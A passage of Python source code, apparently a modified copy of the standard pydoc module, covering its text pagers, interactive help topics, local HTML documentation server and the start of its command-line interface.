line += '\n' + self.indent(str(doc))
return line
class _PlainTextDoc(TextDoc):
"""Subclass of TextDoc which overrides string styling"""
def bold(self, text):
return text
# --------------------------------------------------------- user interfaces
def pager(text):
"""The first time this is called, determine what kind of pager to use."""
global pager
# Escape non-encodable characters to avoid encoding errors later
encoding = sys.getfilesystemencoding()
text = text.encode(encoding, 'backslashreplace').decode(encoding)
pager = getpager()
pager(text)
def getpager():
"""Decide what method to use for paging through text."""
if not hasattr(sys.stdout, "isatty"):
return plainpager
if not sys.stdin.isatty() or not sys.stdout.isatty():
return plainpager
if 'PAGER' in os.environ:
if sys.platform == 'win32': # pipes completely broken in Windows
return lambda text: tempfilepager(plain(text), os.environ['PAGER'])
elif os.environ.get('TERM') in ('dumb', 'emacs'):
return lambda text: pipepager(plain(text), os.environ['PAGER'])
else:
return lambda text: pipepager(text, os.environ['PAGER'])
if os.environ.get('TERM') in ('dumb', 'emacs'):
return plainpager
if sys.platform == 'win32':
return lambda text: tempfilepager(plain(text), 'more <')
if hasattr(os, 'system') and os.system('(less) 2>/dev/null') == 0:
return lambda text: pipepager(text, 'less')
import tempfile
(fd, filename) = tempfile.mkstemp()
os.close(fd)
try:
if hasattr(os, 'system') and os.system('more "%s"' % filename) == 0:
return lambda text: pipepager(text, 'more')
else:
return ttypager
finally:
os.unlink(filename)
def plain(text):
"""Remove boldface formatting from text."""
return re.sub('.\b', '', text)
def pipepager(text, cmd):
"""Page through text by feeding it to another program."""
pipe = os.popen(cmd, 'w')
try:
pipe.write(text)
pipe.close()
except OSError:
pass # Ignore broken pipes caused by quitting the pager program.
def tempfilepager(text, cmd):
"""Page through text by invoking a program on a temporary file."""
import tempfile
filename = tempfile.mktemp()
with open(filename, 'w') as file:
file.write(text)
try:
os.system(cmd + ' "' + filename + '"')
finally:
os.unlink(filename)
def ttypager(text):
"""Page through text on a text terminal."""
lines = plain(text).split('\n')
try:
import tty
fd = sys.stdin.fileno()
old = tty.tcgetattr(fd)
tty.setcbreak(fd)
getchar = lambda: sys.stdin.read(1)
except (ImportError, AttributeError):
tty = None
getchar = lambda: sys.stdin.readline()[:-1][:1]
try:
r = inc = os.environ.get('LINES', 25) - 1
sys.stdout.write('\n'.join(lines[:inc]) + '\n')
while lines[r:]:
sys.stdout.write('-- more --')
sys.stdout.flush()
c = getchar()
if c in ('q', 'Q'):
sys.stdout.write('\r \r')
break
elif c in ('\r', '\n'):
sys.stdout.write('\r \r' + lines[r] + '\n')
r = r + 1
continue
if c in ('b', 'B', '\x1b'):
r = r - inc - inc
if r < 0: r = 0
sys.stdout.write('\n' + '\n'.join(lines[r:r+inc]) + '\n')
r = r + inc
finally:
if tty:
tty.tcsetattr(fd, tty.TCSAFLUSH, old)
def plainpager(text):
"""Simply print unformatted text. This is the ultimate fallback."""
sys.stdout.write(plain(text))
def describe(thing):
"""Produce a short description of the given thing."""
if inspect.ismodule(thing):
if thing.__name__ in sys.builtin_module_names:
return 'built-in module ' + thing.__name__
if hasattr(thing, '__path__'):
return 'package ' + thing.__name__
else:
return 'module ' + thing.__name__
if inspect.isbuiltin(thing):
return 'built-in function ' + thing.__name__
if inspect.isgetsetdescriptor(thing):
return 'getset descriptor %s.%s.%s' % (
thing.__objclass__.__module__, thing.__objclass__.__name__,
thing.__name__)
if inspect.ismemberdescriptor(thing):
return 'member descriptor %s.%s.%s' % (
thing.__objclass__.__module__, thing.__objclass__.__name__,
thing.__name__)
if inspect.isclass(thing):
return 'class ' + thing.__name__
if inspect.isfunction(thing):
return 'function ' + thing.__name__
if inspect.ismethod(thing):
return 'method ' + thing.__name__
return type(thing).__name__
def locate(path, forceload=0):
"""Locate an object by name or dotted path, importing as necessary."""
parts = [part for part in path.split('.') if part]
module, n = None, 0
while n < len(parts):
nextmodule = safeimport('.'.join(parts[:n+1]), forceload)
if nextmodule: module, n = nextmodule, n + 1
else: break
if module:
object = module
else:
object = builtins
for part in parts[n:]:
try:
object = getattr(object, part)
except AttributeError:
return None
return object
# --------------------------------------- interactive interpreter interface
text = TextDoc()
plaintext = _PlainTextDoc()
html = HTMLDoc()
def resolve(thing, forceload=0):
"""Given an object or a path to an object, get the object and its name."""
if isinstance(thing, str):
object = locate(thing, forceload)
if not object:
raise ImportError('no Python documentation found for %r' % thing)
return object, thing
else:
name = getattr(thing, '__name__', None)
return thing, name if isinstance(name, str) else None
def render_doc(thing, title='Python Library Documentation: %s', forceload=0,
renderer=None):
"""Render text documentation, given an object or a path to an object."""
if renderer is None:
renderer = text
object, name = resolve(thing, forceload)
desc = describe(object)
module = inspect.getmodule(object)
if name and '.' in name:
desc += ' in ' + name[:name.rfind('.')]
elif module and module is not object:
desc += ' in module ' + module.__name__
if not (inspect.ismodule(object) or
inspect.isclass(object) or
inspect.isroutine(object) or
inspect.isgetsetdescriptor(object) or
inspect.ismemberdescriptor(object) or
isinstance(object, property)):
# If the passed object is a piece of data or an instance,
# document its available methods instead of its value.
object = type(object)
desc += ' object'
return title % desc + '\n\n' + renderer.document(object, name)
def doc(thing, title='Python Library Documentation: %s', forceload=0,
output=None):
"""Display text documentation, given an object or a path to an object."""
try:
if output is None:
pager(render_doc(thing, title, forceload))
else:
output.write(render_doc(thing, title, forceload, plaintext))
except (ImportError, ErrorDuringImport) as value:
print(value)
def writedoc(thing, forceload=0):
"""Write HTML documentation to a file in the current directory."""
try:
object, name = resolve(thing, forceload)
page = html.page(describe(object), html.document(object, name))
file = open(name + '.html', 'w', encoding='utf-8')
file.write(page)
file.close()
print('wrote', name + '.html')
except (ImportError, ErrorDuringImport) as value:
print(value)
def writedocs(dir, pkgpath='', done=None):
"""Write out HTML documentation for all modules in a directory tree."""
if done is None: done = {}
for importer, modname, ispkg in pkgutil.walk_packages([dir], pkgpath):
writedoc(modname)
return
class Helper:
# These dictionaries map a topic name to either an alias, or a tuple
# (label, seealso-items). The "label" is the label of the corresponding
# section in the .rst file under Doc/ and an index into the dictionary
# in pydoc_data/topics.py.
#
# CAUTION: if you change one of these dictionaries, be sure to adapt the
# list of needed labels in Doc/tools/sphinxext/pyspecific.py and
# regenerate the pydoc_data/topics.py file by running
# make pydoc-topics
# in Doc/ and copying the output file into the Lib/ directory.
keywords = {
'False': '',
'None': '',
'True': '',
'and': 'BOOLEAN',
'as': 'with',
'assert': ('assert', ''),
'break': ('break', 'while for'),
'class': ('class', 'CLASSES SPECIALMETHODS'),
'continue': ('continue', 'while for'),
'def': ('function', ''),
'del': ('del', 'BASICMETHODS'),
'elif': 'if',
'else': ('else', 'while for'),
'except': 'try',
'finally': 'try',
'for': ('for', 'break continue while'),
'from': 'import',
'global': ('global', 'nonlocal NAMESPACES'),
'if': ('if', 'TRUTHVALUE'),
'import': ('import', 'MODULES'),
'in': ('in', 'SEQUENCEMETHODS'),
'is': 'COMPARISON',
'lambda': ('lambda', 'FUNCTIONS'),
'nonlocal': ('nonlocal', 'global NAMESPACES'),
'not': 'BOOLEAN',
'or': 'BOOLEAN',
'pass': ('pass', ''),
'raise': ('raise', 'EXCEPTIONS'),
'return': ('return', 'FUNCTIONS'),
'try': ('try', 'EXCEPTIONS'),
'while': ('while', 'break continue if TRUTHVALUE'),
'with': ('with', 'CONTEXTMANAGERS EXCEPTIONS yield'),
'yield': ('yield', ''),
}
# Either add symbols to this dictionary or to the symbols dictionary
# directly: Whichever is easier. They are merged later.
_symbols_inverse = {
'STRINGS': ("'", "'''", "r'", "b'", '"""', '"', 'r"', 'b"'),
'OPERATORS': ('+', '-', '*', '**', '/', '//', '%', '<<', '>>', '&',
'|', '^', '~', '<', '>', '<=', '>=', '==', '!=', '<>'),
'COMPARISON': ('<', '>', '<=', '>=', '==', '!=', '<>'),
'UNARY': ('-', '~'),
'AUGMENTEDASSIGNMENT': ('+=', '-=', '*=', '/=', '%=', '&=', '|=',
'^=', '<<=', '>>=', '**=', '//='),
'BITWISE': ('<<', '>>', '&', '|', '^', '~'),
'COMPLEX': ('j', 'J')
}
symbols = {
'%': 'OPERATORS FORMATTING',
'**': 'POWER',
',': 'TUPLES LISTS FUNCTIONS',
'.': 'ATTRIBUTES FLOAT MODULES OBJECTS',
'...': 'ELLIPSIS',
':': 'SLICINGS DICTIONARYLITERALS',
'@': 'def class',
'\\': 'STRINGS',
'_': 'PRIVATENAMES',
'__': 'PRIVATENAMES SPECIALMETHODS',
'`': 'BACKQUOTES',
'(': 'TUPLES FUNCTIONS CALLS',
')': 'TUPLES FUNCTIONS CALLS',
'[': 'LISTS SUBSCRIPTS SLICINGS',
']': 'LISTS SUBSCRIPTS SLICINGS'
}
for topic, symbols_ in _symbols_inverse.items():
for symbol in symbols_:
topics = symbols.get(symbol, topic)
if topic not in topics:
topics = topics + ' ' + topic
symbols[symbol] = topics
topics = {
'TYPES': ('types', 'STRINGS UNICODE NUMBERS SEQUENCES MAPPINGS '
'FUNCTIONS CLASSES MODULES FILES inspect'),
'STRINGS': ('strings', 'str UNICODE SEQUENCES STRINGMETHODS '
'FORMATTING TYPES'),
'STRINGMETHODS': ('string-methods', 'STRINGS FORMATTING'),
'FORMATTING': ('formatstrings', 'OPERATORS'),
'UNICODE': ('strings', 'encodings unicode SEQUENCES STRINGMETHODS '
'FORMATTING TYPES'),
'NUMBERS': ('numbers', 'INTEGER FLOAT COMPLEX TYPES'),
'INTEGER': ('integers', 'int range'),
'FLOAT': ('floating', 'float math'),
'COMPLEX': ('imaginary', 'complex cmath'),
'SEQUENCES': ('typesseq', 'STRINGMETHODS FORMATTING range LISTS'),
'MAPPINGS': 'DICTIONARIES',
'FUNCTIONS': ('typesfunctions', 'def TYPES'),
'METHODS': ('typesmethods', 'class def CLASSES TYPES'),
'CODEOBJECTS': ('bltin-code-objects', 'compile FUNCTIONS TYPES'),
'TYPEOBJECTS': ('bltin-type-objects', 'types TYPES'),
'FRAMEOBJECTS': 'TYPES',
'TRACEBACKS': 'TYPES',
'NONE': ('bltin-null-object', ''),
'ELLIPSIS': ('bltin-ellipsis-object', 'SLICINGS'),
'FILES': ('bltin-file-objects', ''),
'SPECIALATTRIBUTES': ('specialattrs', ''),
'CLASSES': ('types', 'class SPECIALMETHODS PRIVATENAMES'),
'MODULES': ('typesmodules', 'import'),
'PACKAGES': 'import',
'EXPRESSIONS': ('operator-summary', 'lambda or and not in is BOOLEAN '
'COMPARISON BITWISE SHIFTING BINARY FORMATTING POWER '
'UNARY ATTRIBUTES SUBSCRIPTS SLICINGS CALLS TUPLES '
'LISTS DICTIONARIES'),
'OPERATORS': 'EXPRESSIONS',
'PRECEDENCE': 'EXPRESSIONS',
'OBJECTS': ('objects', 'TYPES'),
'SPECIALMETHODS': ('specialnames', 'BASICMETHODS ATTRIBUTEMETHODS '
'CALLABLEMETHODS SEQUENCEMETHODS MAPPINGMETHODS '
'NUMBERMETHODS CLASSES'),
'BASICMETHODS': ('customization', 'hash repr str SPECIALMETHODS'),
'ATTRIBUTEMETHODS': ('attribute-access', 'ATTRIBUTES SPECIALMETHODS'),
'CALLABLEMETHODS': ('callable-types', 'CALLS SPECIALMETHODS'),
'SEQUENCEMETHODS': ('sequence-types', 'SEQUENCES SEQUENCEMETHODS '
'SPECIALMETHODS'),
'MAPPINGMETHODS': ('sequence-types', 'MAPPINGS SPECIALMETHODS'),
'NUMBERMETHODS': ('numeric-types', 'NUMBERS AUGMENTEDASSIGNMENT '
'SPECIALMETHODS'),
'EXECUTION': ('execmodel', 'NAMESPACES DYNAMICFEATURES EXCEPTIONS'),
'NAMESPACES': ('naming', 'global nonlocal ASSIGNMENT DELETION DYNAMICFEATURES'),
'DYNAMICFEATURES': ('dynamic-features', ''),
'SCOPING': 'NAMESPACES',
'FRAMES': 'NAMESPACES',
'EXCEPTIONS': ('exceptions', 'try except finally raise'),
'CONVERSIONS': ('conversions', ''),
'IDENTIFIERS': ('identifiers', 'keywords SPECIALIDENTIFIERS'),
'SPECIALIDENTIFIERS': ('id-classes', ''),
'PRIVATENAMES': ('atom-identifiers', ''),
'LITERALS': ('atom-literals', 'STRINGS NUMBERS TUPLELITERALS '
'LISTLITERALS DICTIONARYLITERALS'),
'TUPLES': 'SEQUENCES',
'TUPLELITERALS': ('exprlists', 'TUPLES LITERALS'),
'LISTS': ('typesseq-mutable', 'LISTLITERALS'),
'LISTLITERALS': ('lists', 'LISTS LITERALS'),
'DICTIONARIES': ('typesmapping', 'DICTIONARYLITERALS'),
'DICTIONARYLITERALS': ('dict', 'DICTIONARIES LITERALS'),
'ATTRIBUTES': ('attribute-references', 'getattr hasattr setattr ATTRIBUTEMETHODS'),
'SUBSCRIPTS': ('subscriptions', 'SEQUENCEMETHODS'),
'SLICINGS': ('slicings', 'SEQUENCEMETHODS'),
'CALLS': ('calls', 'EXPRESSIONS'),
'POWER': ('power', 'EXPRESSIONS'),
'UNARY': ('unary', 'EXPRESSIONS'),
'BINARY': ('binary', 'EXPRESSIONS'),
'SHIFTING': ('shifting', 'EXPRESSIONS'),
'BITWISE': ('bitwise', 'EXPRESSIONS'),
'COMPARISON': ('comparisons', 'EXPRESSIONS BASICMETHODS'),
'BOOLEAN': ('booleans', 'EXPRESSIONS TRUTHVALUE'),
'ASSERTION': 'assert',
'ASSIGNMENT': ('assignment', 'AUGMENTEDASSIGNMENT'),
'AUGMENTEDASSIGNMENT': ('augassign', 'NUMBERMETHODS'),
'DELETION': 'del',
'RETURNING': 'return',
'IMPORTING': 'import',
'CONDITIONAL': 'if',
'LOOPING': ('compound', 'for while break continue'),
'TRUTHVALUE': ('truth', 'if while and or not BASICMETHODS'),
'DEBUGGING': ('debugger', 'pdb'),
'CONTEXTMANAGERS': ('context-managers', 'with'),
}
def __init__(self, input=None, output=None):
self._input = input
self._output = output
input = property(lambda self: self._input or sys.stdin)
output = property(lambda self: self._output or sys.stdout)
def __repr__(self):
if inspect.stack()[1][3] == '?':
self()
return ''
return '<pydoc.Helper instance>'
_GoInteractive = object()
def __call__(self, request=_GoInteractive):
if request is not self._GoInteractive:
self.help(request)
else:
self.intro()
self.interact()
self.output.write('''
You are now leaving help and returning to the Python interpreter.
If you want to ask for help on a particular object directly from the
interpreter, you can type "help(object)". Executing "help('string')"
has the same effect as typing a particular string at the help> prompt.
''')
def interact(self):
self.output.write('\n')
while True:
try:
request = self.getline('help> ')
if not request: break
except (KeyboardInterrupt, EOFError):
break
request = replace(request, '"', '', "'", '').strip()
if request.lower() in ('q', 'quit'): break
self.help(request)
def getline(self, prompt):
"""Read one line, using input() when appropriate."""
if self.input is sys.stdin:
return input(prompt)
else:
self.output.write(prompt)
self.output.flush()
return self.input.readline()
def help(self, request):
if type(request) is type(''):
request = request.strip()
if request == 'help': self.intro()
elif request == 'keywords': self.listkeywords()
elif request == 'symbols': self.listsymbols()
elif request == 'topics': self.listtopics()
elif request == 'modules': self.listmodules()
elif request[:8] == 'modules ':
self.listmodules(request.split()[1])
elif request in self.symbols: self.showsymbol(request)
elif request in ['True', 'False', 'None']:
# special case these keywords since they are objects too
doc(eval(request), 'Help on %s:')
elif request in self.keywords: self.showtopic(request)
elif request in self.topics: self.showtopic(request)
elif request: doc(request, 'Help on %s:', output=self._output)
elif isinstance(request, Helper): self()
else: doc(request, 'Help on %s:', output=self._output)
self.output.write('\n')
def intro(self):
self.output.write('''
Welcome to Python %s's help utility!
If this is your first time using Python, you should definitely check out
the tutorial on the Internet at http://docs.python.org/%s/tutorial/.
Enter the name of any module, keyword, or topic to get help on writing
Python programs and using Python modules. To quit this help utility and
return to the interpreter, just type "quit".
To get a list of available modules, keywords, symbols, or topics, type
"modules", "keywords", "symbols", or "topics". Each module also comes
with a one-line summary of what it does; to list the modules whose name
or summary contain a given string such as "spam", type "modules spam".
''' % tuple([sys.version[:3]]*2))
def list(self, items, columns=4, width=80):
items = list(sorted(items))
colw = width // columns
rows = (len(items) + columns - 1) // columns
for row in range(rows):
for col in range(columns):
i = col * rows + row
if i < len(items):
self.output.write(items[i])
if col < columns - 1:
self.output.write(' ' + ' ' * (colw - 1 - len(items[i])))
self.output.write('\n')
def listkeywords(self):
self.output.write('''
Here is a list of the Python keywords. Enter any keyword to get more help.
''')
self.list(self.keywords.keys())
def listsymbols(self):
self.output.write('''
Here is a list of the punctuation symbols which Python assigns special meaning
to. Enter any symbol to get more help.
''')
self.list(self.symbols.keys())
def listtopics(self):
self.output.write('''
Here is a list of available topics. Enter any topic name to get more help.
''')
self.list(self.topics.keys())
def showtopic(self, topic, more_xrefs=''):
try:
import pydoc_data.topics
except ImportError:
self.output.write('''
Sorry, topic and keyword documentation is not available because the
module "pydoc_data.topics" could not be found.
''')
return
target = self.topics.get(topic, self.keywords.get(topic))
if not target:
self.output.write('no documentation found for %s\n' % repr(topic))
return
if type(target) is type(''):
return self.showtopic(target, more_xrefs)
label, xrefs = target
try:
doc = pydoc_data.topics.topics[label]
except KeyError:
self.output.write('no documentation found for %s\n' % repr(topic))
return
pager(doc.strip() + '\n')
if more_xrefs:
xrefs = (xrefs or '') + ' ' + more_xrefs
if xrefs:
import textwrap
text = 'Related help topics: ' + ', '.join(xrefs.split()) + '\n'
wrapped_text = textwrap.wrap(text, 72)
self.output.write('\n%s\n' % ''.join(wrapped_text))
def _gettopic(self, topic, more_xrefs=''):
"""Return unbuffered tuple of (topic, xrefs).
If an error occurs here, the exception is caught and displayed by
the url handler.
This function duplicates the showtopic method but returns its
result directly so it can be formatted for display in an html page.
"""
try:
import pydoc_data.topics
except ImportError:
return('''
Sorry, topic and keyword documentation is not available because the
module "pydoc_data.topics" could not be found.
''', '')
target = self.topics.get(topic, self.keywords.get(topic))
if not target:
raise ValueError('could not find topic')
if isinstance(target, str):
return self._gettopic(target, more_xrefs)
label, xrefs = target
doc = pydoc_data.topics.topics[label]
if more_xrefs:
xrefs = (xrefs or '') + ' ' + more_xrefs
return doc, xrefs
def showsymbol(self, symbol):
target = self.symbols[symbol]
topic, _, xrefs = target.partition(' ')
self.showtopic(topic, xrefs)
def listmodules(self, key=''):
if key:
self.output.write('''
Here is a list of modules whose name or summary contains '{}'.
If there are any, enter a module name to get more help.
'''.format(key))
apropos(key)
else:
self.output.write('''
Please wait a moment while I gather a list of all available modules...
''')
modules = {}
def callback(path, modname, desc, modules=modules):
if modname and modname[-9:] == '.__init__':
modname = modname[:-9] + ' (package)'
if modname.find('.') < 0:
modules[modname] = 1
def onerror(modname):
callback(None, modname, None)
ModuleScanner().run(callback, onerror=onerror)
self.list(modules.keys())
self.output.write('''
Enter any module name to get more help. Or, type "modules spam" to search
for modules whose name or summary contain the string "spam".
''')
help = Helper()
class ModuleScanner:
"""An interruptible scanner that searches module synopses."""
def run(self, callback, key=None, completer=None, onerror=None):
if key: key = key.lower()
self.quit = False
seen = {}
for modname in sys.builtin_module_names:
if modname != '__main__':
seen[modname] = 1
if key is None:
callback(None, modname, '')
else:
name = __import__(modname).__doc__ or ''
desc = name.split('\n')[0]
name = modname + ' - ' + desc
if name.lower().find(key) >= 0:
callback(None, modname, desc)
for importer, modname, ispkg in pkgutil.walk_packages(onerror=onerror):
if self.quit:
break
if key is None:
callback(None, modname, '')
else:
try:
spec = pkgutil._get_spec(importer, modname)
except SyntaxError:
# raised by tests for bad coding cookies or BOM
continue
loader = spec.loader
if hasattr(loader, 'get_source'):
try:
source = loader.get_source(modname)
except Exception:
if onerror:
onerror(modname)
continue
desc = source_synopsis(io.StringIO(source)) or ''
if hasattr(loader, 'get_filename'):
path = loader.get_filename(modname)
else:
path = None
else:
_spec = importlib._bootstrap._SpecMethods(spec)
try:
module = _spec.load()
except ImportError:
if onerror:
onerror(modname)
continue
desc = (module.__doc__ or '').splitlines()[0]
path = getattr(module, '__file__', None)
name = modname + ' - ' + desc
if name.lower().find(key) >= 0:
callback(path, modname, desc)
if completer:
completer()
def apropos(key):
"""Print all the one-line module summaries that contain a substring."""
def callback(path, modname, desc):
if modname[-9:] == '.__init__':
modname = modname[:-9] + ' (package)'
print(modname, desc and '- ' + desc)
def onerror(modname):
pass
with warnings.catch_warnings():
warnings.filterwarnings('ignore') # ignore problems during import
ModuleScanner().run(callback, key, onerror=onerror)
# --------------------------------------- enhanced Web browser interface
def _start_server(urlhandler, port):
"""Start an HTTP server thread on a specific port.
Start an HTML/text server thread, so HTML or text documents can be
browsed dynamically and interactively with a Web browser. Example use:
>>> import time
>>> import pydoc
Define a URL handler. To determine what the client is asking
for, check the URL and content_type.
Then get or generate some text or HTML code and return it.
>>> def my_url_handler(url, content_type):
... text = 'the URL sent was: (%s, %s)' % (url, content_type)
... return text
Start server thread on port 0.
If you use port 0, the server will pick a random port number.
You can then use serverthread.port to get the port number.
>>> port = 0
>>> serverthread = pydoc._start_server(my_url_handler, port)
Check that the server is really started. If it is, open browser
and get first page. Use serverthread.url as the starting page.
>>> if serverthread.serving:
... import webbrowser
The next two lines are commented out so a browser doesn't open if
doctest is run on this module.
#... webbrowser.open(serverthread.url)
#True
Let the server do its thing. We just need to monitor its status.
Use time.sleep so the loop doesn't hog the CPU.
>>> starttime = time.time()
>>> timeout = 1 #seconds
This is a short timeout for testing purposes.
>>> while serverthread.serving:
... time.sleep(.01)
... if serverthread.serving and time.time() - starttime > timeout:
... serverthread.stop()
... break
Print any errors that may have occurred.
>>> print(serverthread.error)
None
"""
import http.server
import email.message
import select
import threading
class DocHandler(http.server.BaseHTTPRequestHandler):
def do_GET(self):
"""Process a request from an HTML browser.
The URL received is in self.path.
Get an HTML page from self.urlhandler and send it.
"""
if self.path.endswith('.css'):
content_type = 'text/css'
else:
content_type = 'text/html'
self.send_response(200)
self.send_header('Content-Type', content_type)
self.end_headers()
self.wfile.write(self.urlhandler(
self.path, content_type).encode('utf-8'))
def log_message(self, *args):
# Don't log messages.
pass
class DocServer(http.server.HTTPServer):
def __init__(self, port, callback):
self.host = (sys.platform == 'mac') and '127.0.0.1' or 'localhost'
self.address = ('', port)
self.callback = callback
self.base.__init__(self, self.address, self.handler)
self.quit = False
def serve_until_quit(self):
while not self.quit:
rd, wr, ex = select.select([self.socket.fileno()], [], [], 1)
if rd:
self.handle_request()
self.server_close()
def server_activate(self):
self.base.server_activate(self)
if self.callback:
self.callback(self)
class ServerThread(threading.Thread):
def __init__(self, urlhandler, port):
self.urlhandler = urlhandler
self.port = int(port)
threading.Thread.__init__(self)
self.serving = False
self.error = None
def run(self):
"""Start the server."""
try:
DocServer.base = http.server.HTTPServer
DocServer.handler = DocHandler
DocHandler.MessageClass = email.message.Message
DocHandler.urlhandler = staticmethod(self.urlhandler)
docsvr = DocServer(self.port, self.ready)
self.docserver = docsvr
docsvr.serve_until_quit()
except Exception as e:
self.error = e
def ready(self, server):
self.serving = True
self.host = server.host
self.port = server.server_port
self.url = 'http://%s:%d/' % (self.host, self.port)
def stop(self):
"""Stop the server and this thread nicely"""
self.docserver.quit = True
self.serving = False
self.url = None
thread = ServerThread(urlhandler, port)
thread.start()
# Wait until thread.serving is True to make sure we are
# really up before returning.
while not thread.error and not thread.serving:
time.sleep(.01)
return thread
CSS_PATH = "pydoc_data/pydoc.css"
def _url_handler(url, content_type="text/html"):
"""The pydoc url handler for use with the pydoc server.
If the content_type is 'text/css', the css style
sheet is read and returned if it exists.
If the content_type is 'text/html', then the result of
get_html_page(url) is returned.
"""
class _HTMLDoc(HTMLDoc):
def page(self, title, contents):
"""Format an HTML page."""
return '''<!doctype html>
<html><head><title>Mod_Pydoc: {}</title><meta charset="utf-8">
<link href="{}" rel="stylesheet">
</head><body>{}
<div class="main">{}</div>
</body></html>'''.format(title, CSS_PATH, html_navbar(), contents)
def filelink(self, url, path):
return '<a href="getfile?key=%s">%s</a>' % (url, path)
html = _HTMLDoc()
def html_navbar():
version = html.escape("%s [%s, %s]" % (platform.python_version(),
platform.python_build()[0],
platform.python_compiler()))
return """
<div style='float:left'>
Python %s<br>%s
</div>
<div style='float:right'>
<div style='text-align:center'>
<a href="index.html">Module Index</a>
: <a href="topics.html">Topics</a>
: <a href="keywords.html">Keywords</a>
</div>
<div>
<form action="get" style='display:inline;'>
<input type=text name=key size=15>
<input type=submit value="Get">
</form>
<form action="search" style='display:inline;'>
<input type=text name=key size=15>
<input type=submit value="Search">
</form>
</div>
</div>
""" % (version, html.escape(platform.platform(terse=True)))
def html_index():
"""Module Index page."""
def bltinlink(name):
return '<a href="%s.html">%s</a>' % (name, name)
heading = html.heading('<span>Index of Modules</span>')
names = [name for name in sys.builtin_module_names
if name != '__main__']
contents = html.multicolumn(names, bltinlink)
contents = [heading, '<p>' + html.bigsection('Built-in Modules',
contents, css_class="builtin_modules")]
seen = {}
for dir in sys.path:
contents.append(html.index(dir, seen))
contents.append(
'<p class="ka_ping_yee"><strong>pydoc</strong> by Ka-Ping Yee'
'<ping@lfw.org></p>')
return 'Index of Modules', ''.join(contents)
def html_search(key):
"""Search results page."""
# scan for modules
search_result = []
def callback(path, modname, desc):
if modname[-9:] == '.__init__':
modname = modname[:-9] + ' (package)'
search_result.append((modname, desc and '- ' + desc))
with warnings.catch_warnings():
warnings.filterwarnings('ignore') # ignore problems during import
ModuleScanner().run(callback, key)
# format page
def bltinlink(name):
return '<a href="%s.html">%s</a>' % (name, name)
results = []
heading = html.heading('Search Results')
for name, desc in search_result:
results.append(bltinlink(name) + desc)
contents = heading + html.bigsection('key = {}'.format(key),
'<br>'.join(results), css_class="search")
return 'Search Results', contents
def html_getfile(path):
"""Get and display a source file listing safely."""
path = path.replace('%20', ' ')
with tokenize.open(path) as fp:
lines = html.escape(fp.read())
body = '<pre>%s</pre>' % lines
heading = html.heading('File Listing')
contents = heading + html.bigsection('File: {}'.format(path), body,
css_class="getfile")
return 'getfile %s' % path, contents
def html_topics():
"""Index of topic texts available."""
def bltinlink(name):
return '<a href="topic?key=%s">%s</a>' % (name, name)
heading = html.heading('Index of Topics')
names = sorted(Helper.topics.keys())
contents = html.multicolumn(names, bltinlink)
contents = heading + html.bigsection('Topics', contents, css_class="topics")
return 'Topics', contents
def html_keywords():
"""Index of keywords."""
heading = html.heading('Index of Keywords')
names = sorted(Helper.keywords.keys())
def bltinlink(name):
return '<a href="topic?key=%s">%s</a>' % (name, name)
contents = html.multicolumn(names, bltinlink)
contents = heading + html.bigsection('Keywords', contents, css_class="keywords")
return 'Keywords', contents
def html_topicpage(topic):
"""Topic or keyword help page."""
buf = io.StringIO()
htmlhelp = Helper(buf, buf)
contents, xrefs = htmlhelp._gettopic(topic)
if topic in htmlhelp.keywords:
title = 'Keyword'
else:
title = 'Topic'
heading = html.heading(title)
contents = '<pre>%s</pre>' % html.markup(contents)
contents = html.bigsection(topic, contents, css_class="topics")
if xrefs:
xrefs = sorted(xrefs.split())
def bltinlink(name):
return '<a href="topic?key=%s">%s</a>' % (name, name)
xrefs = html.multicolumn(xrefs, bltinlink)
xrefs = html.html_section('Related help topics: ', xrefs,
css_class="topics")
return ('%s %s' % (title, topic),
''.join((heading, contents, xrefs)))
def html_getobj(url):
obj = locate(url, forceload=1)
if obj is None and url != 'None':
raise ValueError('could not find object')
title = describe(obj)
content = html.document(obj, url)
return title, content
def html_error(url, exc):
heading = html.heading('Error')
contents = '<br>'.join(html.escape(line) for line in
format_exception_only(type(exc), exc))
contents = heading + html.bigsection(url, contents, css_class="error")
return "Error - %s" % url, contents
def get_html_page(url):
"""Generate an HTML page for url."""
complete_url = url
if url.endswith('.html'):
url = url[:-5]
try:
if url in ("", "index"):
title, content = html_index()
elif url == "topics":
title, content = html_topics()
elif url == "keywords":
title, content = html_keywords()
elif '=' in url:
op, _, url = url.partition('=')
if op == "search?key":
title, content = html_search(url)
elif op == "getfile?key":
title, content = html_getfile(url)
elif op == "topic?key":
# try topics first, then objects.
try:
title, content = html_topicpage(url)
except ValueError:
title, content = html_getobj(url)
elif op == "get?key":
# try objects first, then topics.
if url in ("", "index"):
title, content = html_index()
else:
try:
title, content = html_getobj(url)
except ValueError:
title, content = html_topicpage(url)
else:
raise ValueError('bad pydoc url')
else:
title, content = html_getobj(url)
except Exception as exc:
# Catch any errors and display them in an error page.
title, content = html_error(complete_url, exc)
return html.page(title, content)
if url.startswith('/'):
url = url[1:]
if url.endswith('.css'):
if os.path.isfile(url):
css_path = url
else:
path_here = os.path.dirname(os.path.realpath(__file__))
css_path = os.path.join(path_here, CSS_PATH)
with open(css_path) as fp:
return ''.join(fp.readlines())
elif content_type == 'text/html':
return get_html_page(url)
# Errors outside the url handler are caught by the server.
raise TypeError('unknown content type %r for url %s' % (content_type, url))
def browse(port=0, *, open_browser=True):
"""Start the enhanced pydoc Web server and open a Web browser.
Use port '0' to start the server on an arbitrary port.
Set open_browser to False to suppress opening a browser.
"""
import webbrowser
serverthread = _start_server(_url_handler, port)
if serverthread.error:
print(serverthread.error)
return
if serverthread.serving:
server_help_msg = 'Server commands: [b]rowser, [q]uit'
if open_browser:
webbrowser.open(serverthread.url)
try:
print('Server ready at', serverthread.url)
print(server_help_msg)
while serverthread.serving:
cmd = input('server> ')
cmd = cmd.lower()
if cmd == 'q':
break
elif cmd == 'b':
webbrowser.open(serverthread.url)
else:
print(server_help_msg)
except (KeyboardInterrupt, EOFError):
print()
finally:
if serverthread.serving:
serverthread.stop()
print('Server stopped')
# -------------------------------------------------- command-line interface
def ispath(x):
return isinstance(x, str) and x.find(os.sep) >= 0
def cli():
"""Command-line interface (looks at sys.argv to decide what to do)."""
import getopt
class BadUsage(Exception): pass
global CSS_PATH
# Scripts don't get the current directory in their path by default
# unless they are run with the '-m' switch
if '' not in sys.path:
scriptdir = os.path.dirname(sys.argv[0])
if scriptdir in sys.path:
sys.path.remove(scriptdir)
sys.path.insert(0, '.')
try:
opts, args = getopt.getopt(sys.argv[1:], 'bkc:p:w')
writing = False
start_server = False
open_browser = False
port = None
for opt, val in opts:
if opt == '-b':
start_server = True
open_browser = True
if opt == '-k':
apropos(val)
